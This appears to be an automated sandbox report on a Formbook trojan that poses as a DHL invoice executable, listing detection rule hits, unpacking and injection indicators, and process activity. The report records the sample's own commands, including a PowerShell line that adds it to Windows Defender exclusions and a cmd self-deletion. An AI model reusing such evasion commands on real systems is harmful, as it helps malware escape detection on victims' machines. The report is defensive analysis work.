Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3899090558.000000000E089000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7472, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7760, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 7928, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	Security API names: _0020.AddAccessRule
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	Security API names: _0020.AddAccessRule
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, FQDATELQ9X9cFu3Qxc.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, FQDATELQ9X9cFu3Qxc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, FQDATELQ9X9cFu3Qxc.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, FQDATELQ9X9cFu3Qxc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/6@10/6

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Factura Electronica Pendiente documento No 04BB25083.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipifyeev.13a.ps1

Jump to behavior

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe	ReversingLabs: Detection: 34%
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe	Virustotal: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: systray.pdb source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532295892.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532450254.0000000001810000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3884035219.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532295892.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532450254.0000000001810000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3884035219.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000007.00000003.1532523813.000000000492E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000007.00000003.1534349784.0000000004AD2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000007.00000003.1532523813.000000000492E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000007.00000003.1534349784.0000000004AD2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	.Net Code: lrL8I7rjiC System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, Architectural.cs	.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.6f50000.8.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	.Net Code: lrL8I7rjiC System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, Architectural.cs	.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, Architectural.cs	.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C531B7 pushfd ; iretd	0_2_06C531BA
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041683E push esi; ret	5_2_0041683F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041718B push ds; iretd	5_2_0041718C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041E99E push esi; iretd	5_2_0041E99F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00417224 push ebx; iretd	5_2_0041722A
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041D4F2 push eax; ret	5_2_0041D4F8
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041D4FB push eax; ret	5_2_0041D562
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00417C92 push ss; retf	5_2_00417C9E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041D4A5 push eax; ret	5_2_0041D4F8
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041D55C push eax; ret	5_2_0041D562
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0040F531 push 75DF417Dh; iretd	5_2_0040F536
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019409AD push ecx; mov dword ptr [esp], ecx	5_2_019409B6
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCEB9B5 push esp; retn 0000h	6_2_0DCEBAE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCEE08E push esi; iretd	6_2_0DCEE08F
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCEBB02 push esp; retn 0000h	6_2_0DCEBB03
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCEBB1E push esp; retn 0000h	6_2_0DCEBB1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E07708E push esi; iretd	6_2_0E07708F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E074B02 push esp; retn 0000h	6_2_0E074B03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E074B1E push esp; retn 0000h	6_2_0E074B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E0749B5 push esp; retn 0000h	6_2_0E074AE7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CB09AD push ecx; mov dword ptr [esp], ecx	7_2_04CB09B6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1683E push esi; ret	7_2_02D1683F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1E99E push esi; iretd	7_2_02D1E99F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D17224 push ebx; iretd	7_2_02D1722A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1718B push ds; iretd	7_2_02D1718C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1D4F2 push eax; ret	7_2_02D1D4F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1D4FB push eax; ret	7_2_02D1D562
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1D4A5 push eax; ret	7_2_02D1D4F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1D55C push eax; ret	7_2_02D1D562
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D0F531 push 75DF417Dh; iretd	7_2_02D0F536
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D17C92 push ss; retf	7_2_02D17C9E

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: section name: .text entropy: 7.9217768147100704

Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, emPKJuT6ymTAqlrrUB.cs	High entropy of concatenated method names: 'GVT1sN4obB', 'MZe1rw9b82', 'm211fk8bKi', 'sFt1pvDVQX', 'fW51hPD7it', 'RXb1QdtEtt', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, aHpbjAzSkkTSQPnS7P.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'p26wEmLnU8', 'EUxwBEtvQd', 'MGFwM8JZ3I', 'B98wP1plWa', 'afMw1LK2KE', 'BuEwwiUbN2', 'qtYw7KaeRf'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, si6svfR3UjjFCtAc7T.cs	High entropy of concatenated method names: 'jFtnZbjna4', 'J4LnCHQ9xb', 'Xjf0fcGjEO', 'aWP0psQ3uK', 'O5y0QG5IH1', 'R4o0tkOkhh', 'piA0jkfVbp', 'Yqe0JypUP8', 'ePU06Aj9GN', 'GnZ0N0naPF'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, lWqnYBNWXpWhpF6WYV.cs	High entropy of concatenated method names: 'DnOETAXyEP', 'kKqEeBJFDd', 'KyJEs4OqRx', 'OeTErkYpu8', 'TGBEpo1no3', 'g8DEQv14mf', 'B6REj6hGqc', 'SjREJekgPd', 'aJVENiyYWd', 'jRvEFXQ4yk'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, T4MeU36M6kDM53dRDO.cs	High entropy of concatenated method names: 'Esn0bKvPRP', 'a6y022rw9m', 'orW0TNePdP', 'SJU0eE83F0', 'Bf50BxetkY', 'Y8u0MGhyeY', 'ysv0PR6Ktc', 'J9N019IOEU', 'r780wxDehe', 'coS074KGeW'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, KtCP0PlpQVTFkiyZbtF.cs	High entropy of concatenated method names: 'EIewg9v6Pd', 'WvKwlPaxeR', 'SafwIsBUu3', 'Gv7wbb6GDF', 'cK3wZnFxsJ', 'x8pw2YZU3v', 'Cp9wCMmsOS', 'RvHwTDkc38', 'yWRwefFykm', 'aZgwk5JmgM'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, EjwV8fVXT718mwuv65.cs	High entropy of concatenated method names: 'BWH1CyDrIBjHAiqmLqD', 'M4C5onDBXPFV1vtuxkK', 'zVjD1mx2DH', 'BF8Dw0hZSt', 'vhoD7NJED6', 'OR79gyDp2a63Q4lIs4n', 'iYHJnZDCC1oaw488MSd'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, GXeif0HuBPgo98r8g5.cs	High entropy of concatenated method names: 'sT1BN4qcy6', 'XJyB5JJtwr', 'RUaBhooYvq', 'Ad7BSw16PN', 'ryABrxSgM7', 'Ci0BfS4iIo', 'FUYBp8LOE2', 'pRbBQRjUMA', 'YyTBtN1iHc', 'laTBjCXkn6'
Source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3dc1518.4.raw.unpack, I7B6ZmAJgXiulq8aXx.cs	High entropy of concatenated method names: 'lnxWAlqfqE', 'cpkWGH7WWa', 'yIRWcNI7Qa', 'jp6W0R4YjZ', 'MeMWnYeTB7', 'hChWDUcqX5', 'EddWVAdyMS', 'qTgWXtPly4', 'W2lWvJASOu', 'ApHW9tLcxk'
